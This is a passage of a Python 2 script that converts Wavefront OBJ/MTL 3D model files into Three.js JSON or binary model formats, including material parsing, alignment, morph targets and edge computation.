-------------------
Current limitations
-------------------
- for the moment, only diffuse color and texture are used
(will need to extend shaders / renderers / materials in Three)
- texture coordinates can be wrong in canvas renderer
(there is crude normalization, but it doesn't
work for all cases)
- smoothing can be turned on/off only for the whole mesh
----------------------------------------------
How to get proper OBJ + MTL files with Blender
----------------------------------------------
0. Remove default cube (press DEL and ENTER)
1. Import / create model
2. Select all meshes (Select -> Select All by Type -> Mesh)
3. Export to OBJ (File -> Export -> Wavefront .obj) [*]
- enable following options in exporter
Material Groups
Rotate X90
Apply Modifiers
High Quality Normals
Copy Images
Selection Only
Objects as OBJ Objects
UVs
Normals
Materials
Edges
- select empty folder
- give your exported file name with "obj" extension
- click on "Export OBJ" button
4. Your model is now all files in this folder (OBJ, MTL, number of images)
- this converter assumes all files staying in the same folder,
(OBJ / MTL files use relative paths)
- for WebGL, textures must be power of 2 sized
[*] If OBJ export fails (Blender 2.54 beta), patch your Blender installation
following instructions here:
http://www.blendernation.com/2010/09/12/blender-2-54-beta-released/
------
Author
------
AlteredQualia http://alteredqualia.com
"""
import fileinput
import operator
import random
import os.path
import getopt
import sys
import struct
import math
import glob
# #####################################################
# Configuration
# #####################################################
ALIGN = "none" # center centerxz bottom top none
SHADING = "smooth" # smooth flat
TYPE = "ascii" # ascii binary
TRANSPARENCY = "normal" # normal invert
TRUNCATE = False
SCALE = 1.0
FRAMESTEP = 1
BAKE_COLORS = False
EXPORT_EDGES = False
# default colors for debugging (each material gets one distinct color):
# white, red, green, blue, yellow, cyan, magenta
COLORS = [0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee, 0xeeee00, 0x00eeee, 0xee00ee]
# #####################################################
# Templates
# #####################################################
TEMPLATE_FILE_ASCII = u"""\
// Converted from: %(fname)s
// vertices: %(nvertex)d
// faces: %(nface)d
// normals: %(nnormal)d
// colors: %(ncolor)d
// uvs: %(nuv)d
// materials: %(nmaterial)d
// edges: %(nedge)d
//
// Generated with OBJ -> Three.js converter
// http://github.com/alteredq/three.js/blob/master/utils/exporters/convert_obj_three.py
var model = {
"version" : 2,
"scale" : %(scale)f,
"materials": [%(materials)s],
"vertices": [%(vertices)s],
"morphTargets": [%(morphTargets)s],
"morphColors": [%(morphColors)s],
"normals": [%(normals)s],
"colors": [%(colors)s],
"uvs": [[%(uvs)s]],
"faces": [%(faces)s],
"edges" : [%(edges)s]
};
postMessage( model );
close();
"""
TEMPLATE_FILE_BIN = u"""\
// Converted from: %(fname)s
// vertices: %(nvertex)d
// faces: %(nface)d
// materials: %(nmaterial)d
//
// Generated with OBJ -> Three.js converter
// http://github.com/alteredq/three.js/blob/master/utils/exporters/convert_obj_three.py
var model = {
"version" : 1,
"materials": [%(materials)s],
"buffers": "%(buffers)s"
};
postMessage( model );
close();
"""
TEMPLATE_VERTEX = "%f,%f,%f"
TEMPLATE_VERTEX_TRUNCATE = "%d,%d,%d"
TEMPLATE_N = "%.5g,%.5g,%.5g"
TEMPLATE_UV = "%.5g,%.5g"
TEMPLATE_COLOR = "%.3g,%.3g,%.3g"
TEMPLATE_COLOR_DEC = "%d"
TEMPLATE_EDGE = "%d,%d"
TEMPLATE_MORPH_VERTICES = '\t{ "name": "%s", "vertices": [%s] }'
TEMPLATE_MORPH_COLORS = '\t{ "name": "%s", "colors": [%s] }'
# #####################################################
# Utils
# #####################################################
def file_exists(filename):
"""Return true if file exists and is accessible for reading.
Should be safer than just testing for existence due to links and
permissions magic on Unix filesystems.
@rtype: boolean
"""
try:
f = open(filename, 'r')
f.close()
return True
except IOError:
return False
def get_name(fname):
"""Create model name based of filename ("path/fname.js" -> "fname").
"""
return os.path.splitext(os.path.basename(fname))[0]
def bbox(vertices):
"""Compute bounding box of vertex array.
"""
if len(vertices)>0:
minx = maxx = vertices[0][0]
miny = maxy = vertices[0][1]
minz = maxz = vertices[0][2]
for v in vertices[1:]:
if v[0]<minx:
minx = v[0]
elif v[0]>maxx:
maxx = v[0]
if v[1]<miny:
miny = v[1]
elif v[1]>maxy:
maxy = v[1]
if v[2]<minz:
minz = v[2]
elif v[2]>maxz:
maxz = v[2]
return { 'x':[minx,maxx], 'y':[miny,maxy], 'z':[minz,maxz] }
else:
return { 'x':[0,0], 'y':[0,0], 'z':[0,0] }
def translate(vertices, t):
"""Translate array of vertices by vector t.
"""
for i in xrange(len(vertices)):
vertices[i][0] += t[0]
vertices[i][1] += t[1]
vertices[i][2] += t[2]
def center(vertices):
"""Center model (middle of bounding box).
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0] + (bb['y'][1] - bb['y'][0])/2.0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def top(vertices):
"""Align top of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][1]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def bottom(vertices):
"""Align bottom of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def centerxz(vertices):
"""Center model around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = 0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def normalize(v):
"""Normalize 3d vector"""
l = math.sqrt(v[0]*v[0] + v[1]*v[1] + v[2]*v[2])
if l:
v[0] /= l
v[1] /= l
v[2] /= l
def veckey3(v):
return round(v[0], 6), round(v[1], 6), round(v[2], 6)
# #####################################################
# MTL parser
# #####################################################
def texture_relative_path(fullpath):
texture_file = os.path.basename(fullpath)
return texture_file
def parse_mtl(fname):
"""Parse MTL file.
"""
materials = {}
for line in fileinput.input(fname):
chunks = line.split()
if len(chunks) > 0:
# Material start
# newmtl identifier
if chunks[0] == "newmtl" and len(chunks) == 2:
identifier = chunks[1]
if not identifier in materials:
materials[identifier] = {}
# Diffuse color
# Kd 1.000 1.000 1.000
if chunks[0] == "Kd" and len(chunks) == 4:
materials[identifier]["colorDiffuse"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Ambient color
# Ka 1.000 1.000 1.000
if chunks[0] == "Ka" and len(chunks) == 4:
materials[identifier]["colorAmbient"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Specular color
# Ks 1.000 1.000 1.000
if chunks[0] == "Ks" and len(chunks) == 4:
materials[identifier]["colorSpecular"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Specular coefficient
# Ns 154.000
if chunks[0] == "Ns" and len(chunks) == 2:
materials[identifier]["specularCoef"] = float(chunks[1])
# Transparency
# Tr 0.9 or d 0.9
if (chunks[0] == "Tr" or chunks[0] == "d") and len(chunks) == 2:
if TRANSPARENCY == "invert":
materials[identifier]["transparency"] = 1.0 - float(chunks[1])
else:
materials[identifier]["transparency"] = float(chunks[1])
# Optical density
# Ni 1.0
if chunks[0] == "Ni" and len(chunks) == 2:
materials[identifier]["opticalDensity"] = float(chunks[1])
# Diffuse texture
# map_Kd texture_diffuse.jpg
if chunks[0] == "map_Kd" and len(chunks) == 2:
materials[identifier]["mapDiffuse"] = texture_relative_path(chunks[1])
# Ambient texture
# map_Ka texture_ambient.jpg
if chunks[0] == "map_Ka" and len(chunks) == 2:
materials[identifier]["mapAmbient"] = texture_relative_path(chunks[1])
# Specular texture
# map_Ks texture_specular.jpg
if chunks[0] == "map_Ks" and len(chunks) == 2:
materials[identifier]["mapSpecular"] = texture_relative_path(chunks[1])
# Alpha texture
# map_d texture_alpha.png
if chunks[0] == "map_d" and len(chunks) == 2:
materials[identifier]["mapAlpha"] = texture_relative_path(chunks[1])
# Bump texture
# map_bump texture_bump.jpg or bump texture_bump.jpg
if (chunks[0] == "map_bump" or chunks[0] == "bump") and len(chunks) == 2:
materials[identifier]["mapBump"] = texture_relative_path(chunks[1])
# Illumination
# illum 2
#
# 0. Color on and Ambient off
# 1. Color on and Ambient on
# 2. Highlight on
# 3. Reflection on and Ray trace on
# 4. Transparency: Glass on, Reflection: Ray trace on
# 5. Reflection: Fresnel on and Ray trace on
# 6. Transparency: Refraction on, Reflection: Fresnel off and Ray trace on
# 7. Transparency: Refraction on, Reflection: Fresnel on and Ray trace on
# 8. Reflection on and Ray trace off
# 9. Transparency: Glass on, Reflection: Ray trace off
# 10. Casts shadows onto invisible surfaces
if chunks[0] == "illum" and len(chunks) == 2:
materials[identifier]["illumination"] = int(chunks[1])
return materials
# #####################################################
# OBJ parser
# #####################################################
def parse_vertex(text):
"""Parse text chunk specifying single vertex.
Possible formats:
vertex index
vertex index / texture index
vertex index / texture index / normal index
vertex index / / normal index
"""
v = 0
t = 0
n = 0
chunks = text.split("/")
v = int(chunks[0])
if len(chunks) > 1:
if chunks[1]:
t = int(chunks[1])
if len(chunks) > 2:
if chunks[2]:
n = int(chunks[2])
return { 'v':v, 't':t, 'n':n }
def parse_obj(fname):
"""Parse OBJ file.
"""
vertices = []
normals = []
uvs = []
faces = []
materials = {}
mcounter = 0
mcurrent = 0
mtllib = ""
# current face state
group = 0
object = 0
smooth = 0
for line in fileinput.input(fname):
chunks = line.split()
if len(chunks) > 0:
# Vertices as (x,y,z) coordinates
# v 0.123 0.234 0.345
if chunks[0] == "v" and len(chunks) == 4:
x = float(chunks[1])
y = float(chunks[2])
z = float(chunks[3])
vertices.append([x,y,z])
# Normals in (x,y,z) form; normals might not be unit
# vn 0.707 0.000 0.707
if chunks[0] == "vn" and len(chunks) == 4:
x = float(chunks[1])
y = float(chunks[2])
z = float(chunks[3])
normals.append([x,y,z])
# Texture coordinates in (u,v[,w]) coordinates, w is optional
# vt 0.500 -1.352 [0.234]
if chunks[0] == "vt" and len(chunks) >= 3:
u = float(chunks[1])
v = float(chunks[2])
w = 0
if len(chunks)>3:
w = float(chunks[3])
uvs.append([u,v,w])
# Face
if chunks[0] == "f" and len(chunks) >= 4:
vertex_index = []
uv_index = []
normal_index = []
for v in chunks[1:]:
vertex = parse_vertex(v)
if vertex['v']:
vertex_index.append(vertex['v'])
if vertex['t']:
uv_index.append(vertex['t'])
if vertex['n']:
normal_index.append(vertex['n'])
faces.append({
'vertex':vertex_index,
'uv':uv_index,
'normal':normal_index,
'material':mcurrent,
'group':group,
'object':object,
'smooth':smooth,
})
# Group
if chunks[0] == "g" and len(chunks) == 2:
group = chunks[1]
# Object
if chunks[0] == "o" and len(chunks) == 2:
object = chunks[1]
# Materials definition
if chunks[0] == "mtllib" and len(chunks) == 2:
mtllib = chunks[1]
# Material
if chunks[0] == "usemtl" and len(chunks) == 2:
material = chunks[1]
if not material in materials:
mcurrent = mcounter
materials[material] = mcounter
mcounter += 1
else:
mcurrent = materials[material]
# Smooth shading
if chunks[0] == "s" and len(chunks) == 2:
smooth = chunks[1]
return faces, vertices, uvs, normals, materials, mtllib
# #####################################################
# Generator - faces
# #####################################################
def setBit(value, position, on):
if on:
mask = 1 << position
return (value | mask)
else:
mask = ~(1 << position)
return (value & mask)
def generate_face(f, fc):
isTriangle = ( len(f['vertex']) == 3 )
if isTriangle:
nVertices = 3
else:
nVertices = 4
hasMaterial = True # for the moment OBJs without materials get default material
hasFaceUvs = False # not supported in OBJ
hasFaceVertexUvs = ( len(f['uv']) >= nVertices )
hasFaceNormals = False # don't export any face normals (as they are computed in engine)
hasFaceVertexNormals = ( len(f["normal"]) >= nVertices and SHADING == "smooth" )
hasFaceColors = BAKE_COLORS
hasFaceVertexColors = False # not supported in OBJ
faceType = 0
faceType = setBit(faceType, 0, not isTriangle)
faceType = setBit(faceType, 1, hasMaterial)
faceType = setBit(faceType, 2, hasFaceUvs)
faceType = setBit(faceType, 3, hasFaceVertexUvs)
faceType = setBit(faceType, 4, hasFaceNormals)
faceType = setBit(faceType, 5, hasFaceVertexNormals)
faceType = setBit(faceType, 6, hasFaceColors)
faceType = setBit(faceType, 7, hasFaceVertexColors)
faceData = []
# order is important, must match order in JSONLoader
# face type
# vertex indices
# material index
# face uvs index
# face vertex uvs indices
# face normal index
# face vertex normals indices
# face color index
# face vertex colors indices
faceData.append(faceType)
# must clamp in case on polygons bigger than quads
for i in xrange(nVertices):
index = f['vertex'][i] - 1
faceData.append(index)
faceData.append( f['material'] )
if hasFaceVertexUvs:
for i in xrange(nVertices):
index = f['uv'][i] - 1
faceData.append(index)
if hasFaceVertexNormals:
for i in xrange(nVertices):
index = f['normal'][i] - 1
faceData.append(index)
if hasFaceColors:
index = fc['material']
faceData.append(index)
return ",".join( map(str, faceData) )
# #####################################################
# Generator - chunks
# #####################################################
def hexcolor(c):
return ( int(c[0] * 255) << 16 ) + ( int(c[1] * 255) << 8 ) + int(c[2] * 255)
def generate_vertex(v, option_vertices_truncate, scale):
if not option_vertices_truncate:
return TEMPLATE_VERTEX % (v[0], v[1], v[2])
else:
return TEMPLATE_VERTEX_TRUNCATE % (scale * v[0], scale * v[1], scale * v[2])
def generate_normal(n):
return TEMPLATE_N % (n[0], n[1], n[2])
def generate_uv(uv):
return TEMPLATE_UV % (uv[0], 1.0 - uv[1])
def generate_color_rgb(c):
return TEMPLATE_COLOR % (c[0], c[1], c[2])
def generate_color_decimal(c):
return TEMPLATE_COLOR_DEC % hexcolor(c)
def generate_edge(e):
return TEMPLATE_EDGE % (e[0], e[1])
# #####################################################
# Morphs
# #####################################################
def generate_morph_vertex(name, vertices):
vertex_string = ",".join(generate_vertex(v, TRUNCATE, SCALE) for v in vertices)
return TEMPLATE_MORPH_VERTICES % (name, vertex_string)
def generate_morph_color(name, colors):
color_string = ",".join(generate_color_rgb(c) for c in colors)
return TEMPLATE_MORPH_COLORS % (name, color_string)
def extract_material_colors(materials, mtlfilename, basename):
"""Extract diffuse colors from MTL materials
"""
if not materials:
materials = { 'default': 0 }
mtl = create_materials(materials, mtlfilename, basename)
mtlColorArraySrt = []
for m in mtl:
if m in materials:
index = materials[m]
color = mtl[m].get("colorDiffuse", [1,0,0])
mtlColorArraySrt.append([index, color])
mtlColorArraySrt.sort()
mtlColorArray = [x[1] for x in mtlColorArraySrt]
return mtlColorArray
def extract_face_colors(faces, material_colors):
"""Extract colors from materials and assign them to faces
"""
faceColors = []
for face in faces:
material_index = face['material']
faceColors.append(material_colors[material_index])
return faceColors
def generate_morph_targets(morphfiles, n_vertices, infile):
skipOriginalMorph = False
norminfile = os.path.normpath(infile)
morphVertexData = []
for mfilepattern in morphfiles.split():
matches = glob.glob(mfilepattern)
matches.sort()
indices = range(0, len(matches), FRAMESTEP)
for i in indices:
path = matches[i]
normpath = os.path.normpath(path)
if normpath != norminfile or not skipOriginalMorph:
name = os.path.basename(normpath)
morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
n_morph_vertices = len(morphVertices)
if n_vertices != n_morph_vertices:
print "WARNING: skipping morph [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
else:
if ALIGN == "center":
center(morphVertices)
elif ALIGN == "centerxz":
centerxz(morphVertices)
elif ALIGN == "bottom":
bottom(morphVertices)
elif ALIGN == "top":
top(morphVertices)
morphVertexData.append((get_name(name), morphVertices))
print "adding [%s] with %d vertices" % (name, n_morph_vertices)
morphTargets = ""
if len(morphVertexData):
morphTargets = "\n%s\n\t" % ",\n".join(generate_morph_vertex(name, vertices) for name, vertices in morphVertexData)
return morphTargets
def generate_morph_colors(colorfiles, n_vertices, n_faces):
morphColorData = []
colorFaces = []
materialColors = []
for mfilepattern in colorfiles.split():
matches = glob.glob(mfilepattern)
matches.sort()
for path in matches:
normpath = os.path.normpath(path)
name = os.path.basename(normpath)
morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
n_morph_vertices = len(morphVertices)
n_morph_faces = len(morphFaces)
if n_vertices != n_morph_vertices:
print "WARNING: skipping morph color map [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
elif n_faces != n_morph_faces:
print "WARNING: skipping morph color map [%s] with different number of faces [%d] than the original model [%d]" % (name, n_morph_faces, n_faces)
else:
morphMaterialColors = extract_material_colors(morphMaterials, morphMtllib, normpath)
morphFaceColors = extract_face_colors(morphFaces, morphMaterialColors)
morphColorData.append((get_name(name), morphFaceColors))
# take first color map for baking into face colors
if len(colorFaces) == 0:
colorFaces = morphFaces
materialColors = morphMaterialColors
print "adding [%s] with %d face colors" % (name, len(morphFaceColors))
morphColors = ""
if len(morphColorData):
morphColors = "\n%s\n\t" % ",\n".join(generate_morph_color(name, colors) for name, colors in morphColorData)
return morphColors, colorFaces, materialColors
# #####################################################
# Edges
# #####################################################
def edge_hash(a, b):
return "%d_%d" % (min(a, b), max(a, b))
def add_unique_edge(a, b, edge_set, edges):
h = edge_hash(a[0], b[0])
if h not in edge_set:
x = min(a[1], b[1])
y = max(a[1], b[1])
edges.append([x, y])
edge_set.add(h)
def compute_edges(faces, vertices):
edges = []
# compute unique vertices
unique_vertices = {}
vertex_count = 0
for i, v in enumerate(vertices):
key = veckey3(v)
if key not in unique_vertices:
unique_vertices[key] = [vertex_count, i]
vertex_count += 1
# find edges between unique vertices
edge_set = set()
for f in faces:
vertex_indices = f["vertex"]
unique_indices = []
for vi in vertex_indices:
v = vertices[vi - 1]
key = veckey3(v)
unique_indices.append(unique_vertices[key])
if len(unique_indices) == 3:
a = unique_indices[0]
b = unique_indices[1]
c = unique_indices[2]
add_unique_edge(a, b, edge_set, edges)
add_unique_edge(b, c, edge_set, edges)
add_unique_edge(a, c, edge_set, edges)
elif len(unique_indices) == 4:
a = unique_indices[0]
b = unique_indices[1]
c = unique_indices[2]
d = unique_indices[3]
# this should be inside edge of quad, should it go in?
# add_unique_edge(b, d, edge_set, edges)
add_unique_edge(a, b, edge_set, edges)
add_unique_edge(a, d, edge_set, edges)
add_unique_edge(b, c, edge_set, edges)
add_unique_edge(c, d, edge_set, edges)
edges.sort()
return edges
# #####################################################
# Materials
# #####################################################
def generate_color(i):
"""Generate hex color corresponding to integer.
Colors should have well defined ordering.
First N colors are hardcoded, then colors are random
(must seed random number generator with deterministic value
before getting colors).
"""
if i < len(COLORS):
#return "0x%06x" % COLORS[i]
return COLORS[i]
else:
#return "0x%06x" % int(0xffffff * random.random())
return int(0xffffff * random.random())
def value2string(v):
if type(v)==str and v[0:2] != "0x":
return '"%s"' % v
elif type(v) == bool:
return str(v).lower()
return str(v)
def generate_materials(mtl, materials):
"""Generate JS array of materials objects
JS material objects are basically prettified one-to-one
mappings of MTL properties in JSON format.
"""
mtl_array = []
for m in mtl:
if m in materials:
index = materials[m]
# add debug information
# materials should be sorted according to how
# they appeared in OBJ file (for the first time)
# this index is identifier used in face definitions
mtl[m]['DbgName'] = m
mtl[m]['DbgIndex'] = index
mtl[m]['DbgColor'] = generate_color(index)
if BAKE_COLORS:
mtl[m]['vertexColors'] = "face"
mtl_raw = ",\n".join(['\t"%s" : %s' % (n, value2string(v)) for n,v in sorted(mtl[m].items())])
mtl_string = "\t{\n%s\n\t}" % mtl_raw
mtl_array.append([index, mtl_string])
return ",\n\n".join([m for i,m in sorted(mtl_array)])
def generate_mtl(materials):
"""Generate dummy materials (if there is no MTL file).
"""
mtl = {}
for m in materials:
index = materials[m]
mtl[m] = {
'DbgName': m,
'DbgIndex': index,
'DbgColor': generate_color(index)
}
return mtl
def generate_materials_string(materials, mtlfilename, basename):
"""Generate final materials string.
"""
if not materials:
materials = { 'default': 0 }
mtl = create_materials(materials, mtlfilename, basename)
return generate_materials(mtl, materials)
def create_materials(materials, mtlfilename, basename):
"""Parse MTL file and create mapping between its materials and OBJ materials.
Eventual edge cases are handled here (missing materials, missing MTL file).
"""
random.seed(42) # to get well defined color order for debug colors
# default materials with debug colors for when
# there is no specified MTL / MTL loading failed,
# or if there were no materials / null materials
mtl = generate_mtl(materials)
if mtlfilename:
# create full pathname for MTL (included from OBJ)
path = os.path.dirname(basename)
fname = os.path.join(path, mtlfilename)
if file_exists(fname):
# override default materials with real ones from MTL
# (where they exist, otherwise keep defaults)
mtl.update(parse_mtl(fname))
else:
print "Couldn't find [%s]" % fname
return mtl
# #####################################################
# Faces
# #####################################################
def is_triangle_flat(f):
return len(f['vertex'])==3 and not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_triangle_flat_uv(f):
return len(f['vertex'])==3 and not (f["normal"] and SHADING == "smooth") and len(f['uv'])==3
def is_triangle_smooth(f):
return len(f['vertex'])==3 and f["normal"] and SHADING == "smooth" and not f['uv']
def is_triangle_smooth_uv(f):
return len(f['vertex'])==3 and f["normal"] and SHADING == "smooth" and len(f['uv'])==3
def is_quad_flat(f):
return len(f['vertex'])==4 and not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_quad_flat_uv(f):
return len(f['vertex'])==4 and not (f["normal"] and SHADING == "smooth") and len(f['uv'])==4
def is_quad_smooth(f):
return len(f['vertex'])==4 and f["normal"] and SHADING == "smooth" and not f['uv']
def is_quad_smooth_uv(f):
return len(f['vertex'])==4 and f["normal"] and SHADING == "smooth" and len(f['uv'])==4
def sort_faces(faces):
data = {
'triangles_flat': [],
'triangles_flat_uv': [],
'triangles_smooth': [],
'triangles_smooth_uv': [],
'quads_flat': [],
'quads_flat_uv': [],
'quads_smooth': [],
'quads_smooth_uv': []
}
for f in faces:
if is_triangle_flat(f):
data['triangles_flat'].append(f)
elif is_triangle_flat_uv(f):
data['triangles_flat_uv'].append(f)
elif is_triangle_smooth(f):
data['triangles_smooth'].append(f)
elif is_triangle_smooth_uv(f):
data['triangles_smooth_uv'].append(f)
elif is_quad_flat(f):
data['quads_flat'].append(f)
elif is_quad_flat_uv(f):
data['quads_flat_uv'].append(f)
elif is_quad_smooth(f):
data['quads_smooth'].append(f)
elif is_quad_smooth_uv(f):
data['quads_smooth_uv'].append(f)
return data
# #####################################################
# API - ASCII converter
# #####################################################
def convert_ascii(infile, morphfiles, colorfiles, outfile):
"""Convert infile.obj to outfile.js
Here is where everything happens. If you need to automate conversions,
just import this file as Python module and call this method.
"""
if not file_exists(infile):
print "Couldn't find [%s]" % infile
return
# parse OBJ / MTL files
faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
n_vertices = len(vertices)
n_faces = len(faces)
# align model
if ALIGN == "center":
center(vertices)
elif ALIGN == "centerxz":
centerxz(vertices)
elif ALIGN == "bottom":
bottom(vertices)
elif ALIGN == "top":
top(vertices)
# generate normals string
nnormal = 0
normals_string = ""
if SHADING == "smooth":
normals_string = ",".join(generate_normal(n) for n in normals)
nnormal = len(normals)
# extract morph vertices
morphTargets = generate_morph_targets(morphfiles, n_vertices, infile)
# extract morph colors
morphColors, colorFaces, materialColors = generate_morph_colors(colorfiles, n_vertices, n_faces)
# generate colors string
ncolor = 0
colors_string = ""
if len(colorFaces) < len(faces):
colorFaces = faces
materialColors = extract_material_colors(materials, mtllib, infile)
if BAKE_COLORS:
colors_string = ",".join(generate_color_decimal(c) for c in materialColors)
ncolor = len(materialColors)
# generate edges string
nedge = 0
edges_string = ""
if EXPORT_EDGES:
edges = compute_edges(faces, vertices)
nedge = len(edges)
edges_string = ",".join(generate_edge(e) for e in edges)
# generate ascii model string
text = TEMPLATE_FILE_ASCII % {
"name" : get_name(outfile),
"fname" : infile,
"nvertex" : len(vertices),
"nface" : len(faces),
"nuv" : len(uvs),
"nnormal" : nnormal,
"ncolor" : ncolor,
"nmaterial" : len(materials),
"nedge" : nedge,
"materials" : generate_materials_string(materials, mtllib, infile),
"normals" : normals_string,
"colors" : colors_string,
"uvs" : ",".join(generate_uv(uv) for uv in uvs),
"vertices" : ",".join(generate_vertex(v, TRUNCATE, SCALE) for v in vertices),
"morphTargets" : morphTargets,
"morphColors" : morphColors,
"faces" : ",".join(generate_face(f, fc) for f, fc in zip(faces, colorFaces)),
"edges" : edges_string,
"scale" : SCALE
}
out = open(outfile, "w")
out.write(text)
out.close()
print "%d vertices, %d faces, %d materials" % (len(vertices), len(faces), len(materials))
# #############################################################################
# API - Binary converter
# #############################################################################
def convert_binary(infile, outfile):
"""Convert infile.obj to outfile.js + outfile.bin
"""
if not file_exists(infile):
print "Couldn't find [%s]" % infile
return
binfile = get_name(outfile) + ".bin"
faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
if ALIGN == "center":
center(vertices)
elif ALIGN == "centerxz":
centerxz(vertices)
elif ALIGN == "bottom":
bottom(vertices)
elif ALIGN == "top":
top(vertices)
sfaces = sort_faces(faces)
# ###################
# generate JS file
# ###################
text = TEMPLATE_FILE_BIN % {
"name" : get_name(outfile),
"materials" : generate_materials_string(materials, mtllib, infile),
"buffers" : binfile,
"fname" : infile,
"nvertex" : len(vertices),
"nface" : len(faces),
"nmaterial" : len(materials)
}
out = open(outfile, "w")
out.write(text)
out.close()
# ###################
# generate BIN file
# ###################
if SHADING == "smooth":
nnormals = len(normals)
else:
nnormals = 0
buffer = []
# header
# ------
header_bytes = struct.calcsize('<8s')
header_bytes += struct.calcsize('<BBBBBBBB')
header_bytes += struct.calcsize('<IIIIIIIIIII')
# signature
signature = struct.pack('<8s', 'Three.js')
# metadata (all data is little-endian)
vertex_coordinate_bytes = 4
normal_coordinate_bytes = 1
uv_coordinate_bytes = 4
vertex_index_bytes = 4
normal_index_bytes = 4
uv_index_bytes = 4
material_index_bytes = 2
# header_bytes unsigned char 1
# vertex_coordinate_bytes unsigned char 1
# normal_coordinate_bytes unsigned char 1
# uv_coordinate_bytes unsigned char 1
# vertex_index_bytes unsigned char 1
# normal_index_bytes unsigned char 1
# uv_index_bytes unsigned char 1
# material_index_bytes unsigned char 1
bdata = struct.pack('<BBBBBBBB', header_bytes,
vertex_coordinate_bytes,
normal_coordinate_bytes,
uv_coordinate_bytes,
vertex_index_bytes,
normal_index_bytes,
uv_index_bytes,
material_index_bytes)
# nvertices unsigned int 4
# nnormals unsigned int 4
# nuvs unsigned int 4
# ntri_flat unsigned int 4
# ntri_smooth unsigned int 4
# ntri_flat_uv unsigned int 4
# ntri_smooth_uv unsigned int 4
# nquad_flat unsigned int 4
# nquad_smooth unsigned int 4
# nquad_flat_uv unsigned int 4
# nquad_smooth_uv unsigned int 4
ndata = struct.pack('<IIIIIIIIIII', len(vertices),
nnormals,
len(uvs),
len(sfaces['triangles_flat']),
len(sfaces['triangles_smooth']),
len(sfaces['triangles_flat_uv']),
len(sfaces['triangles_smooth_uv']),
len(sfaces['quads_flat']),
len(sfaces['quads_smooth']),
len(sfaces['quads_flat_uv']),
len(sfaces['quads_smooth_uv']))
buffer.append(signature)
buffer.append(bdata)
buffer.append(ndata)
# 1. vertices
# ------------
# x float 4
# y float 4
# z float 4
for v in vertices:
data = struct.pack('<fff', v[0], v[1], v[2])
buffer.append(data)
# 2. normals
# ---------------
# x signed char 1
# y signed char 1
# z signed char 1
if SHADING == "smooth":
for n in normals:
normalize(n)
data = struct.pack('<bbb', math.floor(n[0]*127+0.5),
math.floor(n[1]*127+0.5),
math.floor(n[2]*127+0.5))
buffer.append(data)
# 3. uvs
# -----------
# u float 4
# v float 4
for uv in uvs:
data = struct.pack('<ff', uv[0], 1.0-uv[1])
buffer.append(data)
# 4. flat triangles
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
for f in sfaces['triangles_flat']:
vi = f['vertex']
data = struct.pack('<IIIH',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'])
buffer.append(data)
# 5. smooth triangles
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
for f in sfaces['triangles_smooth']:
vi = f['vertex']
ni = f['normal']
data = struct.pack('<IIIHIII',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1)
buffer.append(data)
# 6. flat triangles uv
# --------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
for f in sfaces['triangles_flat_uv']:
vi = f['vertex']
ui = f['uv']
data = struct.pack('<IIIHIII',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'],
ui[0]-1, ui[1]-1, ui[2]-1)
buffer.append(data)
# 7. smooth triangles uv
# ----------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
for f in sfaces['triangles_smooth_uv']:
vi = f['vertex']
ni = f['normal']
ui = f['uv']
data = struct.pack('<IIIHIIIIII',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1,
ui[0]-1, ui[1]-1, ui[2]-1)
buffer.append(data)
# 8. flat quads
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
for f in sfaces['quads_flat']:
vi = f['vertex']
data = struct.pack('<IIIIH',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'])
buffer.append(data)
# 9. smooth quads
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# nd unsigned int 4
for f in sfaces['quads_smooth']:
vi = f['vertex']
ni = f['normal']
